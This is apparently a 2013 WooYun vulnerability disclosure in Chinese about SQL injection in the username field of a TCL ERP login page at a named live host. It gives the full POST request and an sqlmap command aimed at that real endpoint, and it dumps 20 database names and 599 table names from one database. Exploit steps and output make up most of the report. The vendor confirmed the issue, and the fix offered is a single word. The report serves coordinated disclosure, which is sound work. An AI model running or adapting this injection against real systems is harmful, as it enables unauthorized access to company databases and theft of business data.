漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2013-043253
漏洞标题:TCL#某ERP系统存在SQL注射漏洞
相关厂商:TCL官方网上商城
漏洞作者: Mr.leo
提交时间:2013-11-18 16:11
修复时间:2014-01-02 16:11
公开时间:2014-01-02 16:11
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:15
漏洞状态:厂商已经确认
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2013-11-18: 细节已通知厂商并且等待厂商处理中
2013-11-18: 厂商已经确认,细节仅向厂商公开
2013-11-28: 细节向核心白帽子及相关领域专家公开
2013-12-08: 细节向普通白帽子公开
2013-12-18: 细节向实习白帽子公开
2014-01-02: 细节向公众公开
简要描述:
TCL#某ERP系统存在SQL注射漏洞(599张表)
详细说明:
1、问题站点:
http://tclkt.etoway.cn/
2、问题链接:
http://tclkt.etoway.cn/web/SubmitLogin.do
3、用户名处没有过滤,导致注射漏洞
POST http://tclkt.etoway.cn/web/SubmitLogin.do HTTP/1.1
Host: tclkt.etoway.cn
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:18.0) Gecko/20100101 Firefox/18.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://tclkt.etoway.cn/web/SubmitLogin.do
Cookie: CPCUserName=11; ch1=true; ch2=false; entcode=2; lastloginuser=11; JSESSIONID=FB8VSJtpztKSCJSM3LQBQ21Tt1JzDGB9GhzQ2sMs02bBJ6KvxgsG!740692211
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 115
value%28userName%29=11&value%28password%29=12&value%28entcode1%29=2&value%28entcode%29=2&Submit=%E7%99%BB+%E5%BD%95
4、SQLmap跑起来
sqlmap.py -u "http://tclkt.etoway.cn/web/SubmitLogin.do" --data "value(userName)=1" --dbs --current-user --current-db
available databases [20]:
[*] AJEBS
[*] AJSERP
[*] BDBASE
[*] BDCRM
[*] BMS
[*] CRMTW
[*] DBSNMP
[*] FSBAPPS
[*] FSBCPC
[*] FSBGN
[*] OUTLN
[*] SERP
[*] SYS
[*] SYSTEM
[*] TCLXJD
[*] TSMSYS
[*] TWSALE
[*] TWSERP
[*] WMSYS
[*] YILIDA
当前TWSERP库中有599张表
Database: TWSERP
[599 tables]
+------------------------------+
| "CPCDOCTEMP#" |
| AB2 |
| BASE_AREA |
| BASE_CURRENCY |
| BASE_RATE |
| BASE_SYSTEM_PAPER |
| BASE_TRADE |
| BID_LOGIN_NODE |
| BID_RFX_APPLY |
| BID_RFX_NOTICE |
| BID_VENDOR_MANAGE |
| BILL_NUMBER |
| BUSINESS_ROLE |
| CITY_AREA_HEAD |
| CITY_AREA_LINE |
| COCOBJCONF_0918 |
| COMPANY_ATTACHMENT |
| COMPANY_BUSINESS_RELATION |
| COMPANY_CONFIRM |
| COMPANY_CONTACT |
| COMPANY_CONTRASTING_RELATION |
| COMPANY_FACILITY_INVENTORY |
| COMPANY_INFO |
| COMPANY_INVITATIONS |
| COMPANY_MAIN_CUSTOMER |
| COMPANY_ORG |
| COMPANY_PARAMETER |
| COMPANY_PARAMETER_RELATION |
| COMPANY_RELATION_HEAD |
| COMPANY_RELATION_LINE |
| COMPANY_USER_CONTRASTING |
| COMPANY_USER_RELATION |
| COMPANY_VENDOR_MATERIAL |
| CPCADDRBOOK |
| CPCAPP |
| CPCAREA |
| CPCATTACH |
| CPCATTACHINTF |
| CPCAUTHAPPLY |
| CPCAUTOBOM |
| CPCBBS |
| CPCBBSATTACH |
| CPCBBSDETAIL |
| CPCBBSDETAILATTACH |
| CPCBBSITEM |
| CPCBBSUSER |
| CPCBILLWFTEMP |
| CPCBLACKNAME |
| CPCBOM |
| CPCBOMALTBILL |
| CPCBOMALTSU |
| CPCBOMD |
| CPCBOMDALT |
| CPCBOMDH |
| CPCBOMDOP |
| CPCBOMDOPH |
| CPCBOMFORMCONTROL |
| CPCBOMH |
| CPCBOMINTFHEAD |
| CPCBOMINTFLINE |
| CPCBOMLOG |
| CPCBOMOP |
| CPCBOMOPH |
| CPCBOMVIEW |
| CPCBOMVIEWALTSU |
| CPCBOM_INTF |
| CPCBPLDEF |
| CPCBUG |
| CPCBUGCUST |
| CPCBUGCUSTVERSION |
| CPCBUGDUTYUSER |
| CPCBUGFIX |
| CPCBUGFIXDB |
| CPCBUGFIXUSER |
| CPCBUGH |
| CPCBUGPROJ |
| CPCBUGPROJMOD |
| CPCBUGPROJVERSION |
| CPCBUGREVIEW |
| CPCBUGTEST |
| CPCBUGUSERRIGHT |
| CPCCADDRAWMODELCONF |
| CPCCADWS |
| CPCCALEND |
| CPCCALENDAGENT |
| CPCCALENDATTACH |
| CPCCALENDITEM |
| CPCCATEGORY |
| CPCCERT |
| CPCCERTIFICATE |
| CPCCLAS |
| CPCCLASPROP |
| CPCCLASPROPBAK |
| CPCCODE |
| CPCCODELIST |
| CPCCODENODE |
| CPCCONTACT |
| CPCCONTACTG |
| CPCCONTACTGLINE |
| CPCCOUNTRY |
| CPCCOUNTRYLINE |
| CPCCURRENCY |
| CPCCUST |
| CPCCUSTBRAND |
| CPCCUSTCOUNTRY |
| CPCCUSTPANEL |
| CPCCUSTREMIT |
| CPCDEFC |
| CPCDEFPROPSET |
| CPCDELOBJ |
| CPCDICT |
| CPCDOC |
| CPCDOCBRANCH |
| CPCDOCC |
| CPCDOCCACHE |
| CPCDOCCROSS |
| CPCDOCCROSSH |
| CPCDOCCS |
| CPCDOCDEL |
| CPCDOCH |
| CPCDOCMODEL |
| CPCDOCMODELH |
| CPCDOCMOVE |
| CPCDOCMRK |
| CPCDOCNAMEH |
| CPCDOCREF |
| CPCDOCREVREF |
| CPCDOCRMK |
| CPCDOCS |
| CPCDOCSH |
| CPCDOCTEMP |
| CPCDOCTRK |
| CPCDRAWITEMREL |
| CPCDRAWITEMRELREV |
| CPCDSS |
| CPCDSSC |
| CPCDSSCROSS |
| CPCDSSCROSSH |
| CPCDSSCS |
| CPCDSSH |
| CPCDSSREF |
| CPCDSSREVREF |
| CPCDSSS |
| CPCDSSSH |
| CPCDUTY |
| CPCDUTYKIND |
| CPCECDATA |
| CPCECINVORG |
| CPCECINVORGLINE |
| CPCECN |
| CPCECNATTACH |
| CPCECNBATCHCLINE |
| CPCECNBOMLINE |
| CPCECNCM |
| CPCECNCMCDATA |
| CPCECNCMDEFPROPSET |
| CPCECNCMITEMOPRATION |
| CPCECNCMRPT |
| CPCECNDOC |
| CPCECNDRAWLINE |
| CPCECNITEMCODEAPPLY |
| CPCECNITEMCODEAPPLYLINE |
| CPCECNITEMLINE |
| CPCECNITEMLINELANG |
| CPCECNMTLDEALLINE |
| CPCECNOPERATION |
| CPCECNSAMCONFIRM |
| CPCECNSAMCONFIRMLINE |
| CPCECNTF |
| CPCECNTFATTACH |
| CPCECNTFBATCHCLINE |
| CPCECNTFBOMLINE |
| CPCECNTFITEMLINE |
| CPCECNTFMTLDEALLINE |
| CPCECNTRANSFORMLINE |
| CPCECNTYPE |
| CPCECPROP |
| CPCECR |
| CPCECRLINE |
| CPCEMAIL |
| CPCEMAILC |
| CPCEMAILINTF |
| CPCEMAILRULE |
| CPCEMAILTRK |
| CPCEMAILTRKBAK |
| CPCEMPCHANGE |
| CPCEMPCONTRACT |
| CPCEMPHORTATION |
| CPCEMPLANG |
| CPCEMPLOYEE |
| CPCEMPPOSITION |
| CPCEMPRELATION |
| CPCEMPRESUME |
| CPCEMPWAGE |
| CPCENT |
| CPCENTAPPLY |
| CPCENTEBS |
| CPCENTSCM |
| CPCEXCHRATE |
| CPCEXPFITPLAN |
| CPCEXPFITPLANLINE |
| CPCEXPPLAN |
| CPCEXPPLANLINE |
| CPCEXTOBJ |
| CPCFDR |
| CPCFDRCROSS |
| CPCFDRCROSSH |
| CPCFDRH |
| CPCFDROBJ |
| CPCFDROBJREF |
| CPCFDRREF |
| CPCFDRREVREF |
| CPCFDRS |
| CPCFDRSH |
| CPCFIELD |
| CPCFNAME |
| CPCFRMCONF |
| CPCFUNC |
| CPCGPC |
| CPCGPCACL |
| CPCGPCCOLOREDIT |
| CPCGPCCONFIGDEF |
| CPCGPCCUSTOMEXP |
| CPCGPCH |
| CPCGPCHPC |
| CPCGPCLOG |
| CPCGPCSAP |
| CPCGRIDOP |
| CPCGROUP |
| CPCGROUPACL |
| CPCGROUPHEADER |
| CPCGROUPLINE |
| CPCGROUPPOSITION |
| CPCIDLIST |
| CPCINGOODS |
| CPCINGOODSLINE |
| CPCINTF |
| CPCINTFCOL |
| CPCINTFERROR |
| CPCINVORG |
| CPCINVORGBOMVIEW |
| CPCINVORGITEMASSIGN |
| CPCINVORGITEMASSIGNAPPLY |
| CPCINVORGITEMASSIGNAPPLYLINE |
| CPCITEM |
| CPCITEMBOMSYNC |
| CPCITEMBORROW |
| CPCITEMBORROWLINE |
| CPCITEMBRAND |
| CPCITEMCAT |
| CPCITEMCERT |
| CPCITEMCROSS |
| CPCITEMCROSSH |
| CPCITEMDRAW |
| CPCITEMEVACOST |
| CPCITEMEVACOSTLINE |
| CPCITEMFORMCONTROL |
| CPCITEMH |
| CPCITEMIDX |
| CPCITEMINTFCOST |
| CPCITEMINTFHEAD |
| CPCITEMINTFLINE |
| CPCITEMLOC |
| CPCITEMLOG |
| CPCITEMLOGDETAIL |
| CPCITEMOWNERORG |
| CPCITEMPROPCONTROL |
| CPCITEMPROPSYNC |
| CPCITEMREF |
| CPCITEMRELOBJ |
| CPCITEM_INTF |
| CPCITEM_LANG |
| CPCKEYC |
| CPCKEYCTEMPPROP |
| CPCKEYCTRLFILETYPE |
| CPCKEYCTRLIP |
| CPCKEYCTRLOUTSET |
| CPCKEYCTRLPROCESS |
| CPCKPIACTION |
| CPCKPICONF |
| CPCKPIOPTION |
| CPCKPIVALUE |
| CPCLC |
| CPCLCSTAT |
| CPCLINEUSER |
| CPCLOC |
| CPCMATERIEL |
| CPCMATERIELLINE |
| CPCMEMO |
| CPCMENU |
| CPCMENU20110127 |
| CPCMENU20110127_1 |
| CPCMENU20110921 |
| CPCMENU929 |
| CPCMENUAPPLY |
| CPCMENU_0308 |
| CPCMENU_0808 |
| CPCMENU_0927 |
| CPCMENU_20100326 |
| CPCMENU_20130520 |
| CPCMENU_BAK |
| CPCMENU_BAK_ZQ |
| CPCMENU_ZQ20111116 |
| CPCMESSAGEHISTORY |
| CPCMOD |
| CPCMOD20110127 |
| CPCMOD201101271 |
| CPCMOD929 |
| CPCMODAPPLY |
| CPCMODDOC |
| CPCMODEL |
| CPCMODELCODE |
| CPCMOD_0808 |
| CPCMOD_0927 |
| CPCMOD_20100326 |
| CPCMOD_20110705 |
| CPCMOD_20130520 |
| CPCMOD_BAK |
| CPCMOD_BAK_ZQ |
| CPCMOD_ZQ20111116 |
| CPCMRPITEMTEMP |
| CPCMRPORG |
| CPCMRPTRANS |
| CPCNODECTRL |
| CPCNODEVALUE |
| CPCOBJCONF |
| CPCOBJCONF_0927 |
| CPCOBJCONF_20100326 |
| CPCOBJCONF_20110705 |
| CPCOBJCONF_20110705_1 |
| CPCOBJCONF_20130520 |
| CPCOBJEXCEL |
| CPCOBJLANG |
| CPCOBJNOTICECONF |
| CPCOBJPROPTMP |
| CPCOBJREFCONF |
| CPCOBJRPTCONF |
| CPCOBJWFRIGHT |
| CPCOBJWFTEMP |
| CPCOPTEMP |
| CPCOPTION |
| CPCORG |
| CPCORGACL |
| CPCORGLOC |
| CPCORGPOSITION |
| CPCORGUSER |
| CPCPACK |
| CPCPACKBRANCH |
| CPCPACKH |
| CPCPACKLOCATION |
| CPCPACKREF |
| CPCPACKREFH |
| CPCPANEL |
| CPCPDMINTFTRAN |
| CPCPLANADJUSTRULE |
| CPCPLANASSESSUSER |
| CPCPLANCAR |
| CPCPLANFORMULA |
| CPCPLANKPI |
| CPCPLANMONTH |
| CPCPLANMONTHTASK |
| CPCPLANMONTHTASKUP |
| CPCPLANMONTHUP |
| CPCPLANORGLEADER |
| CPCPLANORGTYPE |
| CPCPLANPUNISH |
| CPCPLANTASKCHANGE |
| CPCPLANUSER |
| CPCPLANUSERGRADE |
| CPCPLANUSERGRADEITEM |
| CPCPLANUSERKPI |
| CPCPLANUSERTYPE |
| CPCPLANWFROLE |
| CPCPLANYEAR |
| CPCPORTALENTMOD |
| CPCPOSITION |
| CPCPOSITIONINDEX |
| CPCPOSITIONSKILL |
| CPCPOSITIONUSER |
| CPCPOSITIONWORK |
| CPCPROCCOND |
| CPCPROCCONDH |
| CPCPROCCONDTEMP |
| CPCPROCUSER |
| CPCPROCUSERH |
| CPCPROCUSERTEMP |
| CPCPRODUCESUBLINE |
| CPCPRODUCT |
| CPCPROJ |
| CPCPROJCH |
| CPCPROJCROSS |
| CPCPROJDOC |
| CPCPROJFEE |
| CPCPROJLEADER |
| CPCPROJPS |
| CPCPROJREF |
| CPCPROJS |
| CPCPROJSOITEM |
| CPCPROJUSER |
| CPCPUBGORG |
| CPCPUBGUSER |
| CPCPUBLISHG |
| CPCPUNISHINTF |
| CPCPURCHUSER |
| CPCPURITEMTEMP |
| CPCREMIT |
| CPCRESCROSS |
| CPCRESOURCE |
| CPCRESS |
| CPCROLE |
| CPCROLEAPPLY |
| CPCROLEENT |
| CPCROLEFUNCACL |
| CPCROLEMENUACL |
| CPCROLEMENUACL_0927 |
| CPCROLEMOD |
| CPCROLEMOD_0927 |
| CPCROLEOBJ |
| CPCROLEORG |
| CPCROLEUSER |
| CPCROLE_0927 |
| CPCSALELINE |
| CPCSALEPRODUCE |
| CPCSCHEDULER |
| CPCSCHTASK |
| CPCSCHUSER |
| CPCSEAPORT |
| CPCSELLBOM |
| CPCSELLBOMLINE |
| CPCSELLBOMOP |
| CPCSESSION |
| CPCSHEET |
| CPCSHEETC |
| CPCSHEETCS |
| CPCSHEETITEM |
| CPCSHORTCUT |
| CPCSHTCHECK |
| CPCSHTCOL |
| CPCSHTGROUP |
| CPCSHTINS |
| CPCSHTPAGES |
| CPCSHTPUBLISH |
| CPCSHTTABLE |
| CPCSHTVALUES |
| CPCSHTWFPROC |
| CPCSMSLOG |
| CPCSMSRECV |
| CPCSMSSAMPLE |
| CPCSMSSEND |
| CPCSMTPQUEUE |
| CPCSOB |
| CPCSTATCONF |
| CPCSTATDATAGROWTH |
| CPCSTATFUNC |
| CPCSTATFUNC_OLD |
| CPCSTATSLOWFUNC |
| CPCSTATTHRUPUT |
| CPCSTDCOND |
| CPCSTDCONDDETAIL |
| CPCSYS |
| CPCSYSAUTH |
| CPCSYSCONF |
| CPCSYSCONF_0927 |
| CPCSYSCONF_EN |
| CPCSYSCONF_J |
| CPCSYSLANG |
| CPCSYSLOG |
| CPCSYSLOG_BAK |
| CPCTABLELOCK |
| CPCTASK |
| CPCTASKCH |
| CPCTASKIO |
| CPCTASKLOG |
| CPCTASKOPINION |
| CPCTASKPUBOPIN |
| CPCTASKREF |
| CPCTASKRES |
| CPCTASKUSER |
| CPCTODOLIST |
| CPCTSSDRAW |
| CPCUNIT |
| CPCUSER |
| CPCUSERACC |
| CPCUSERACL |
| CPCUSERAGENT |
| CPCUSERBAK |
| CPCUSERDUTY |
| CPCUSERENT |
| CPCUSERFUNCACL |
| CPCUSERG |
| CPCUSERIMAIL |
| CPCUSERKPI |
| CPCUSERMENUACL |
| CPCUSERMOD |
| CPCUSEROPINION |
| CPCUSEROPINIONH |
| CPCUSERPROFILE |
| CPCUSERREL |
| CPCUSERSHT |
| CPCUSERSOB |
| CPCUSERUSERG |
| CPCUSERWFTEMP |
| CPCUSER_BAK |
| CPCUSER_ORG |
| CPCVAULT |
| CPCWATCHIDX |
| CPCWF |
| CPCWFATTACH |
| CPCWFOBJ |
| CPCWFOBJTEMP |
| CPCWFPROC |
| CPCWFPROCH |
| CPCWFPROCNOTICE |
| CPCWFPROCSIGN |
| CPCWFPROCSIGNTEMP |
| CPCWFPROCTASK |
| CPCWFPROCTEMP |
| CPCWFPROCTEMPNOTICE |
| CPCWFPROCTEMP_20100413 |
| CPCWFPROCTYPE |
| CPCWFPUBLISH |
| CPCWFPUBTEMP |
| CPCWFREF |
| CPCWFSHEET |
| CPCWFTEMP |
| CPCWFTEMPCROSS |
| CPCWFTEMPREF |
| CPCWFTEMPS |
| CPCWFUSERRANGE |
| CPCWORKLOG |
| CPCWORKPLAN |
| CPCWORKSPACE |
| CPCWORKTIME |
| CPCWORKTIMECFG |
| CPCWSENT |
| CPCWSOBJ |
| CPCWSREF |
| CPC_COLUMN |
| CPC_VENDOR |
| EBS_CPC_USER_RELATION |
| INTERFACEVENDOR |
| INTERFACE_SYNCHRONIZED |
| ITEM_BIG_KIND |
| ITEM_KIND_USER_RELATION |
| LOGINLOG |
| LOGINLOG20130306 |
| LOGINLOG_H |
| LOGIN_GALANZ |
| LOGIN_MACRO |
| LOGIN_TCLKT |
| PDM_LISTCONFHEAD |
| PDM_LISTCONFLINE |
| PRIVATE_TRADE |
| QUESTION_TYPE |
| RPTDS |
| RPTSP |
| RPTTABLE |
| SERPINIT_COMPANY |
| SHOP_ORDER |
| SHOP_ORDER_LINE |
| SHOP_PRODUCT_PRICE |
| SHOP_REMIT_MONEY |
| STANDARD_MENU |
| STANDARD_MOD |
| STANDARD_ROLE |
| STANDARD_ROLEMENUACL |
| SYSTEM_NOTICE |
| SYSTEM_NOTICE_ENTCODE_LIST |
| SYS_TEMP_FBT |
| TENANT_CUSTOMER |
| TENANT_CUSTOMER_DS |
| TENANT_CUSTOMER_LOC |
| TENANT_CUSTOMER_LOG |
| TENANT_CUSTOMER_MENU |
| TENANT_CUSTOMER_MOD |
| TENANT_CUSTOMER_PRODUCT |
| TENANT_CUSTOMER_ROLE |
| TENANT_ENTCODE |
| TENANT_PRODUCT |
| TENANT_PRODUCT_APPLY |
| TENANT_PRODUCT_DOC |
| TENANT_PRODUCT_DOC_LIST |
| TENANT_PRODUCT_MENU |
| TENANT_PRODUCT_MOD |
| TENANT_PRODUCT_ROLE |
| TENANT_PRODUCT_TYPE |
| TMP_ABCD |
| TMP_DBA_FREE_SPACE |
| TMP_SERP |
| TMP_VENDOR_COLLECT |
| TMP_VENDOR_COLLECT_628 |
| TRADE_INFO |
| T_USER |
| UOM |
| USER_ACCESS_RELATION |
| USER_AUTHENTICATE |
| USER_INFO |
| USETABLESPACES |
| USETABLESPACESNEW |
+------------------------------+
over
漏洞证明:
available databases [20]:
[*] AJEBS
[*] AJSERP
[*] BDBASE
[*] BDCRM
[*] BMS
[*] CRMTW
[*] DBSNMP
[*] FSBAPPS
[*] FSBCPC
[*] FSBGN
[*] OUTLN
[*] SERP
[*] SYS
[*] SYSTEM
[*] TCLXJD
[*] TSMSYS
[*] TWSALE
[*] TWSERP
[*] WMSYS
[*] YILIDA
修复方案:
过滤
版权声明:转载请注明来源 Mr.leo@乌云
漏洞回应
厂商回应:
危害等级:中
漏洞Rank:10
确认时间:2013-11-18 16:21
厂商回复:
感谢您的关注,已转交相关单位确认处理。
最新状态:
暂无